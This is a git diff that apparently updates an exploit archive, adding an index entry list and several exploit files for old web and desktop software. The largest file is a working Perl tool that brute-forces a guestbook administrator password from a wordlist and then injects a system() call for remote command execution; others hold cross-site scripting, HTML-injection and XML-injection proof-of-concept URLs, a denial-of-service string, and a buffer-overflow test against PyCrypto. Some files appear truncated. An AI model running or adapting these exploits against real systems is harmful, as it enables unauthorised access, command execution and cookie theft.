diff --git a/files.csv b/files.csv
index bc4d57dcb..4ed028ecc 100755
--- a/files.csv
+++ b/files.csv
@@ -23461,7 +23461,7 @@ id,file,description,date,author,platform,type,port
26365,platforms/php/webapps/26365.txt,"MySource 2.14 Request.php PEAR_PATH Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0
26366,platforms/php/webapps/26366.txt,"GLPI 0.83.8 - Multiple Vulnerabilities",2013-06-21,LiquidWorm,php,webapps,0
26367,platforms/windows/local/26367.py,"Adrenalin Player 2.2.5.3 (.asx) - SEH Buffer Overflow",2013-06-21,Onying,windows,local,0
-26368,platforms/freebsd/local/26368.c,"FreeBSD 9.0-9.1 mmap/ptrace Privilege Esclation Exploit",2013-06-21,Hunger,freebsd,local,0
+26368,platforms/freebsd/local/26368.c,"FreeBSD 9.0-9.1 mmap/ptrace - Privilege Esclation Exploit",2013-06-21,Hunger,freebsd,local,0
26369,platforms/php/webapps/26369.txt,"MySource 2.14 Mail.php PEAR_PATH Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0
26370,platforms/php/webapps/26370.txt,"MySource 2.14 Date.php PEAR_PATH Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0
26371,platforms/php/webapps/26371.txt,"MySource 2.14 Span.php PEAR_PATH Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0
@@ -29527,3 +29527,19 @@ id,file,description,date,author,platform,type,port
32765,platforms/multiple/webapps/32765.txt,"csUpload Script Site - Authentication Bypass",2014-04-09,Satanic2000,multiple,webapps,0
32766,platforms/php/webapps/32766.txt,"Autonomy Ultraseek 'cs.html' URI Redirection Vulnerability",2009-01-28,buzzy,php,webapps,0
32767,platforms/php/webapps/32767.txt,"QuickCms 5.4 - Multiple Vulnerabilites",2014-04-09,"Shpend Kurtishaj",php,webapps,0
+32768,platforms/cgi/webapps/32768.pl,"PerlSoft Gstebuch Version: 1.7b 'admincenter.cgi' Remote Command Execution Vulnerability",2009-01-29,Perforin,cgi,webapps,0
+32769,platforms/php/remote/32769.php,"PHP 5.2.5 'mbstring.func_overload' Webserver Denial Of Service Vulnerability",2009-01-30,strategma,php,remote,0
+32770,platforms/php/webapps/32770.txt,"E-Php B2B Trading Marketplace Script Multiple Cross Site Scripting Vulnerabilities",2009-01-30,SaiedHacker,php,webapps,0
+32772,platforms/windows/dos/32772.py,"Nokia Multimedia Player 1.1 '.m3u' File Heap Buffer Overflow Vulnerability",2009-02-03,zer0in,windows,dos,0
+32773,platforms/php/webapps/32773.txt,"Simple Machines Forum <= 1.1.7 '[url]' Tag HTML Injection Vulnerability",2009-02-03,Xianur0,php,webapps,0
+32774,platforms/multiple/dos/32774.txt,"QIP 2005 Malformed Rich Text Message Remote Denial of Service Vulnerability",2009-02-04,ShineShadow,multiple,dos,0
+32776,platforms/hardware/remote/32776.txt,"Cisco IOS 12.4(23) HTTP Server Multiple Cross Site Scripting Vulnerabilities",2009-02-04,Zloss,hardware,remote,0
+32777,platforms/php/webapps/32777.html,"MetaBBS 0.11 Administration Settings Authentication Bypass Vulnerability",2009-02-04,make0day,php,webapps,0
+32778,platforms/windows/local/32778.pl,"Password Door 8.4 Local Buffer Overflow Vulnerability",2009-02-05,b3hz4d,windows,local,0
+32779,platforms/php/webapps/32779.txt,"Ilch CMS 1.1 'HTTP_X_FORWARDED_FOR' SQL Injection Vulnerability",2009-02-06,Gizmore,php,webapps,0
+32780,platforms/linux/remote/32780.py,"PyCrypto ARC2 Module Buffer Overflow Vulnerability",2009-02-07,"Mike Wiacek",linux,remote,0
+32781,platforms/multiple/remote/32781.txt,"PyBlosxom 1.6.3 Atom Flavor Multiple XML Injection Vulnerabilities",2009-02-09,"Nam Nguyen",multiple,remote,0
+32782,platforms/php/webapps/32782.txt,"FotoWeb 6.0 Login.fwx s Parameter XSS",2009-02-09,"Stelios Tigkas",php,webapps,0
+32783,platforms/php/webapps/32783.txt,"FotoWeb 6.0 Grid.fwx search Parameter XSS",2009-02-09,"Stelios Tigkas",php,webapps,0
+32784,platforms/php/webapps/32784.txt,"glFusion 1.1 Anonymous Comment 'username' Field HTML Injection Vulnerability",2009-02-05,"Bjarne Mathiesen Schacht",php,webapps,0
+32785,platforms/php/webapps/32785.txt,"Bitrix Site Manager 6/7 Multiple Input Validation Vulnerabilities",2009-02-09,aGGreSSor,php,webapps,0
diff --git a/platforms/cgi/webapps/32768.pl b/platforms/cgi/webapps/32768.pl
new file mode 100755
index 000000000..8a0de0b52
--- /dev/null
+++ b/platforms/cgi/webapps/32768.pl
@@ -0,0 +1,108 @@
+source: http://www.securityfocus.com/bid/33525/info
+
+PerlSoft Gästebuch is prone to a vulnerability that attackers can leverage to execute arbitrary commands. This issue occurs because the application fails to adequately sanitize user-supplied input. Note that an attacker must have administrative access to the script to exploit this issue.
+
+Successful attacks can compromise the affected application and possibly the underlying computer.
+
+PerlSoft Gästebuch 1.7b is vulnerable; other versions may also be affected.
+
+#!/usr/bin/perl
+=pod
+Typ: Bruter & RCE
+Name: PerlSoft GB Pwner
+Affected Software: PerlSoft Gstebuch Version: 1.7b
+Coder/Bugfounder: Perforin
+Visit: DarK-CodeZ.org
+Note: RCE ist only 1 time possible, do not waste your command!
+=cut
+
+use strict;
+use warnings;
+use diagnostics;
+
+use LWP::Simple;
+use LWP::Simple::Post qw(post post_xml);
+
+my ($url,$user,$wordlist,$error_counter,$word,$anfrage);
+my ($falsch,$richtig,$entry,$rce,$send,$crypted);
+my (@response,@rcesend,@array);
+
+if (@ARGV < 4) { &fail; }
+
+($url,$user,$wordlist) = (@ARGV);
+
+$falsch = '
Nur Administratoren mit gültigen Benutzerdaten haben Zugang in das Admin-Center! |
';
+$richtig = 'Gästebuch Vorlage - Einstellen |
';
+
+if ($url !~ m/^http:\/\//) { &fail; }
+if ($wordlist !~ m/\.(txt|list|dat)$/) { &fail; }
+
+print <<"show";
+
+--==[Perforins PerlSoft GB Pwner]==--
+
+[+] Attack: $url
+[+] User: $user
+[+] Wordlist: $wordlist
+
+show
+open(WordList,"<","$wordlist") || die "No wordlist found!";
+foreach $word () {
+chomp($word);
+$crypted = crypt($word,"codec");
+$anfrage = $url.'?sub=vorlage&id='.$user.'&pw='.$crypted;
+@array = get($anfrage) || (print "[-] Cannot connect!\n") && exit;
+foreach $entry (@array) {
+if ($entry =~ m/$richtig/i) {
+print "\n[+] Password cracked: "."$crypted:$word"." !\n\n";
+if ($ARGV[3] =~ m/yes/i ) {
+print <<"RCE";
+[+] Remote Command Execution possible!
+[~] Note: Only _1_ time exploitable, do not waste it!
+[+] Please enter your Command!
+RCE
+chomp($rce = );
+$rce =~ s/>/\"\.chr(62)\.\"/ig;
+$rce =~ s/\"\.chr(60)\.\"/ig;
+$rce =~ s/\|/\"\.chr(124)\.\"/ig;
+$rce =~ s/&/\"\.chr(38)\.\"/ig;
+$rce =~ s/\//\"\.chr(47)\.\"/ig;
+$rce =~ s/-/\"\.chr(45)\.\"/ig;
+$send = 'loginname='.$user.'&loginpw='.$word.'&loginname1='.$user.'";system("'.$rce.'");print "h4x&loginpw1='.$word.'&loginpw2='.$word.'&id='.$user.'&pw='.$crypted.'&sub=saveadmindaten';
+@response = post($url, $send);
+@rcesend = get($url) || (print "[-] Cannot connect!\n") && exit;
+print <<"END";
+[+] Command executed!
+
+---====[www.vx.perforin.de.vu]====---
+END
+exit;
+} else { (print "---====[www.vx.perforin.de.vu]====---\n") and exit; }
+} elsif ($entry =~ m/$falsch/i) {
+$error_counter++;
+print "[~] Tested ".$error_counter.": "."$crypted:$word"."\n";
+}
+}
+}
+close(WordList);
+print "[-] Could not be cracked!\n";
+exit;
+sub fail {
+print <<"CONFIG";
++-------------------+
+| |
+| PerlSoft GB Pwner |
+| v0.1 |
+| |
++-------------------+-----[Coded by Perforin]-----------------------------+
+| |
+| brute.pl http://www.example.com/cgi-bin/admincenter.cgi admin wordlist.txt yes |
+| brute.pl http://www.example.com/cgi-bin/admincenter.cgi admin wordlist.txt no |
+| |
+| yes = Remote Command Execution |
+| no = No Remote Command Execution |
+| |
++-------------------------[vx.perforin.de.vu]-----------------------------+
+CONFIG
+exit;
+}
diff --git a/platforms/hardware/remote/32776.txt b/platforms/hardware/remote/32776.txt
new file mode 100755
index 000000000..1ae9b6631
--- /dev/null
+++ b/platforms/hardware/remote/32776.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/33625/info
+
+Cisco IOS HTTP Server is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials. The attacker may also perform cross-site request-forgery attacks on the same scripts and parameters. Other attacks may also be possible.
+
+Note that this issue may be related to an issue described in BID 33260 (Cisco IOS HTTP Server Multiple Cross Site Scripting Vulnerabilities).
+
+Cisco IOS 12.4(23) is vulnerable; other versions may also be affected.
+
+http://www.example.com/level/15/exec/-/"> http://www.example.com/exec/">
\ No newline at end of file
diff --git a/platforms/linux/remote/32780.py b/platforms/linux/remote/32780.py
new file mode 100755
index 000000000..7b7f9c6b2
--- /dev/null
+++ b/platforms/linux/remote/32780.py
@@ -0,0 +1,129 @@
+source: http://www.securityfocus.com/bid/33674/info
+
+PyCrypto (Python Cryptography Toolkit) is prone to a buffer-overflow vulnerability because it fails to adequately verify user-supplied input.
+
+Successful exploits may allow attackers to execute arbitrary code in the context of applications using the vulnerable module. Failed attempts may lead to a denial-of-service condition.
+
+# -*- coding: utf-8 -*-
+#
+# SelfTest/Cipher/ARC2.py: Self-test for the Alleged-RC2 cipher
+#
+# =======================================================================
+# Copyright (C) 2008 Dwayne C. Litzenberger
+#
+# Permission is hereby granted, free of charge, to any person obtaining
+# a copy of this software and associated documentation files (the
+# "Software"), to deal in the Software without restriction, including
+# without limitation the rights to use, copy, modify, merge, publish,
+# distribute, sublicense, and/or sell copies of the Software, and to
+# permit persons to whom the Software is furnished to do so.
+#
+# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
+# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
+# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
+# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
+# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
+# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
+# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
+# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
+# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+# =======================================================================
+#
+
+"""Self-test suite for Crypto.Cipher.ARC2"""
+
+__revision__ = "$Id$"
+
+from common import dict # For compatibility with Python 2.1 and 2.2
+
+import unittest
+
+# This is a list of (plaintext, ciphertext, key[, description[, extra_params]]) tuples.
+test_data = [
+ # Test vectors from RFC 2268
+
+ # 63-bit effective key length
+ ('0000000000000000', 'ebb773f993278eff', '0000000000000000',
+ 'RFC2268-1', dict(effective_keylen=63)),
+
+ # 64-bit effective key length
+ ('ffffffffffffffff', '278b27e42e2f0d49', 'ffffffffffffffff',
+ 'RFC2268-2', dict(effective_keylen=64)),
+ ('1000000000000001', '30649edf9be7d2c2', '3000000000000000',
+ 'RFC2268-3', dict(effective_keylen=64)),
+ ('0000000000000000', '61a8a244adacccf0', '88',
+ 'RFC2268-4', dict(effective_keylen=64)),
+ ('0000000000000000', '6ccf4308974c267f', '88bca90e90875a',
+ 'RFC2268-5', dict(effective_keylen=64)),
+ ('0000000000000000', '1a807d272bbe5db1', '88bca90e90875a7f0f79c384627bafb2',
+ 'RFC2268-6', dict(effective_keylen=64)),
+
+ # 128-bit effective key length
+ ('0000000000000000', '2269552ab0f85ca6', '88bca90e90875a7f0f79c384627bafb2',
+ "RFC2268-7", dict(effective_keylen=128)),
+ ('0000000000000000', '5b78d3a43dfff1f1',
+ '88bca90e90875a7f0f79c384627bafb216f80a6f85920584c42fceb0be255daf1e',
+ "RFC2268-8", dict(effective_keylen=129)),
+
+ # Test vectors from PyCrypto 2.0.1's testdata.py
+ # 1024-bit effective key length
+ ('0000000000000000', '624fb3e887419e48', '5068696c6970476c617373',
+ 'PCTv201-0'),
+ ('ffffffffffffffff', '79cadef44c4a5a85', '5068696c6970476c617373',
+ 'PCTv201-1'),
+ ('0001020304050607', '90411525b34e4c2c', '5068696c6970476c617373',
+ 'PCTv201-2'),
+ ('0011223344556677', '078656aaba61cbfb', '5068696c6970476c617373',
+ 'PCTv201-3'),
+ ('0000000000000000', 'd7bcc5dbb4d6e56a', 'ffffffffffffffff', 'PCTv201-4'),
+ ('ffffffffffffffff', '7259018ec557b357', 'ffffffffffffffff', 'PCTv201-5'),
+ ('0001020304050607', '93d20a497f2ccb62', 'ffffffffffffffff', 'PCTv201-6'),
+ ('0011223344556677', 'cb15a7f819c0014d', 'ffffffffffffffff', 'PCTv201-7'),
+ ('0000000000000000', '63ac98cdf3843a7a',
+ 'ffffffffffffffff5065746572477265656e6177617953e5ffe553',
+ 'PCTv201-8'),
+ ('ffffffffffffffff', '3fb49e2fa12371dd',
+ 'ffffffffffffffff5065746572477265656e6177617953e5ffe553',
+ 'PCTv201-9'),
+ ('0001020304050607', '46414781ab387d5f',
+ 'ffffffffffffffff5065746572477265656e6177617953e5ffe553',
+ 'PCTv201-10'),
+ ('0011223344556677', 'be09dc81feaca271',
+ 'ffffffffffffffff5065746572477265656e6177617953e5ffe553',
+ 'PCTv201-11'),
+ ('0000000000000000', 'e64221e608be30ab', '53e5ffe553', 'PCTv201-12'),
+ ('ffffffffffffffff', '862bc60fdcd4d9a9', '53e5ffe553', 'PCTv201-13'),
+ ('0001020304050607', '6a34da50fa5e47de', '53e5ffe553', 'PCTv201-14'),
+ ('0011223344556677', '584644c34503122c', '53e5ffe553', 'PCTv201-15'),
+]
+
+class BufferOverflowTest(unittest.TestCase):
+ # Test a buffer overflow found in older versions of PyCrypto
+
+ def setUp(self):
+ global ARC2
+ from Crypto.Cipher import ARC2
+
+ def runTest(self):
+ """ARC2 with keylength > 128"""
+ key = "x" * 16384
+ mode = ARC2.MODE_ECB
+ self.assertRaises(ValueError, ARC2.new, key, mode)
+
+def get_tests(config={}):
+ from Crypto.Cipher import ARC2
+ from common import make_block_tests
+
+ tests = make_block_tests(ARC2, "ARC2", test_data)
+ tests.append(BufferOverflowTest())
+
+ return tests
+
+if __name__ == '__main__':
+ import unittest
+ suite = lambda: unittest.TestSuite(get_tests())
+ unittest.main(defaultTest='suite')
+
+# vim:set ts=4 sw=4 sts=4 expandtab:
diff --git a/platforms/multiple/dos/32774.txt b/platforms/multiple/dos/32774.txt
new file mode 100755
index 000000000..18148b119
--- /dev/null
+++ b/platforms/multiple/dos/32774.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/33609/info
+
+QIP 2005 is prone to a remote denial-of-service vulnerability.
+
+Exploiting this issue may allow attackers to cause the application to hang and consume excessive computer resources, denying service to legitimate users.
+
+NOTE: This issue may occur in a third-party component used by QIP 2005, but this has not been confirmed.
+
+This issue affects QIP 2005 build 8082; other versions may also be vulnerable.
+
+{\rtf\pict\&&}
diff --git a/platforms/multiple/remote/32781.txt b/platforms/multiple/remote/32781.txt
new file mode 100755
index 000000000..20a83c55a
--- /dev/null
+++ b/platforms/multiple/remote/32781.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/33676/info
+
+PyBlosxom is prone to multiple XML-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+Attacker-supplied XML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
+
+PyBlosxom 1.4.3 is vulnerable; other versions may also be affected.
+
+http://host/path/%3Ccool%3E?flav=atom
+
\ No newline at end of file
diff --git a/platforms/php/remote/32769.php b/platforms/php/remote/32769.php
new file mode 100755
index 000000000..2412cafb6
--- /dev/null
+++ b/platforms/php/remote/32769.php
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/33542/info
+
+PHP is prone to a denial-of-service vulnerability because it fails to limit global scope for certain settings relating to Unicode text operations.
+
+Attackers can exploit this issue to crash the affected webserver, denying service to legitimate users.
+
+
\ No newline at end of file
diff --git a/platforms/php/webapps/32770.txt b/platforms/php/webapps/32770.txt
new file mode 100755
index 000000000..6929efe43
--- /dev/null
+++ b/platforms/php/webapps/32770.txt
@@ -0,0 +1,8 @@
+source: http://www.securityfocus.com/bid/33551/info
+
+E-Php B2B Trading Marketplace Script is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+http://www.example.com/b2b/signin.php?errmsg=%3Cscript%3Ealert(1);%3C/script%3E
+http://www.example.com/b2b/gen_confirm.php?errmsg=%3Cscript%3Ealert(1);%3C/script%3E
\ No newline at end of file
diff --git a/platforms/php/webapps/32773.txt b/platforms/php/webapps/32773.txt
new file mode 100755
index 000000000..8f4d3f014
--- /dev/null
+++ b/platforms/php/webapps/32773.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/33595/info
+
+Simple Machines Forum is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
+
+[center][size=14pt][url=][/url][/size] [url=javascript:document.write('